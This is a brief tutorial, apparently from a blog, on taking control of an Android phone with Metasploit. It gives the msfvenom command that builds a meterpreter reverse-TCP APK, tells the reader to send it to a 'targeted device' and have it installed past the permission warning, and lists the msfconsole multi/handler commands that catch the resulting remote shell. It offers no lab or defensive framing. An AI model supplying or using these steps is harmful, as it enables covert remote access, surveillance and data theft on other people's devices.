Exploitng Android using Metasploit
       Step 1:- Open Terminal or Root Terminal in Kali-Linux Write the payload for android  which is given below       msfvenom -p android/meterpreter/reverse_tcp lhost=<Enter your IP address> lport=4444  > android.apk You can use any lport like 4444,8080      Step 2:- Send the apk file to the targeted device Then after installing it and it will ask for permission that shown bellow Then aftertouch on install Anyway      It will look like that shown in the image [MainActivity]       Step 3:- Write commands shown bellow msfconsole use exploit/multi/handler set payload android/meterpreter/reverse_tcp set lhost <Your IP address>  set lport  <which you write in payload> run/exploit Then after click on mainactivity on android [It's msfconsole] [It's all commands]                               ...
 
 
 
